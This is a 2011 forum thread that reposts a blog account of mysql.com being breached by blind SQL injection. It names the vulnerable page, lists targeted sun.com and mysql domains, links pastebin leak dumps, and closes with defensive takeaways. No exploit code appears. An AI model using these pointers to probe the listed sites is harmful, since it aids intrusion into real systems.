Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / NewStats: 3,193,170 members, 7,950,036 topics. Date: Monday, 16 September 2024 at 06:59 AM |
Nairaland Forum / Science/Technology / Webmasters / Mysql.com Vulnerable To Blind Sql Injection Vulnerability (1845 Views)
Over A Million Web Sites Affected In Mass Sql Injection Attack / Facebook Vulnerable To Html Injection / Quick Sql Injection Vulnerability Test (2) (3) (4)
Mysql.com Vulnerable To Blind Sql Injection Vulnerability by Slyr0x: 11:21pm On Mar 27, 2011 |
Allow me to point out a little bit of irony in this headline , a website for one of the more popular open-source database alternatives gets completely compromised using blind SQL Injection. Ouch. Someone going by the moniker "Jack haxor" posted this to the Full Disclosure mailing list just a little while ago , giving a nice explanation of what's happened and more importantly where the vulnerable target page is (customers/view/index.html) so others can go and play for themselves. MySQL has (as of this writing) not issued a statement yet , which probably means they're scrambling to close up and clean up the mess , whatever that mess may be. Did the attacker get into anything more than just the databases behind the website? Maybe we'll know, maybe we won't -but this is at very least very unsettling for the open-source database organization. Hopefully they have clean, check-summed backups, right? Oh, and if you're interested in seeing the handywork that resulted from this compromise , check out this pastebin.com link , I swear I had nothing to do with that rabbit/hat graphic. Some take-aways from this one , 1. Never re-use passwords across too many websites of different security levels 2. Use complex pass-phrases as much as possible so they're harder to crack 3. Back up, then check-sum your backups and keep them off offline in case you need a restore point 4. Hiding the SQL error from an attacker will still get you compromised (blind SQL injection) 5. Check your code , attackers don't sleep, and won't spare you just because you're an open-source, charitable project 6. It can happen to anyone, anywhere at any time link ---> www3.hp.com/t5/Following-the-White-Rabbit-A/MySQL-WebSite-Hacked-by-Ironically-Blind-SQL-Injection/ba-p/25359">http://h30501.www3.hp.com/t5/Following-the-White-Rabbit-A/MySQL-WebSite-Hacked-by-Ironically-Blind-SQL-Injection/ba-p/25359 |
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by Slyr0x: 11:26pm On Mar 27, 2011 |
Full Disclosure here --> http://pastebin.com/BayvYdcP --> http://pastebin.com/7y9LymN3 +) Targets: www.reman.sun.com www.ibb.sun.com www.mysql.com www.mysql.fr www.mysql.de www.mysql.it www-jp.mysql.com |
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by ogzille(m): 8:53am On Mar 28, 2011 |
nawa o!!! |
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by WebMonk(m): 10:33am On Mar 28, 2011 |
I guess there are no exceptions |
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by Slyr0x: 8:53pm On Mar 28, 2011 |
ogzille: Na cRious wa. . WebMonk: No exceptions o0. . .Check http://www.zone-h.org/archive/special=1 |
Re: Mysql.com Vulnerable To Blind Sql Injection Vulnerability by Nobody: 12:48am On Mar 31, 2011 |
this is serious. obviously these guys dont have "give up" in their books i get at least 2 attacks daily on one of my age long projects, not a popular website What happens if it's popular? |
(1) (Reply)
Top Nigerian Google Adense Earners / Nigeria Police Meets With Bloggers To Curb Fake News / Hard Working Entertainment Admins Needed
(Go Up)
Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health religion celebs tv-movies music-radio literature webmasters programming techmarket Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 12 |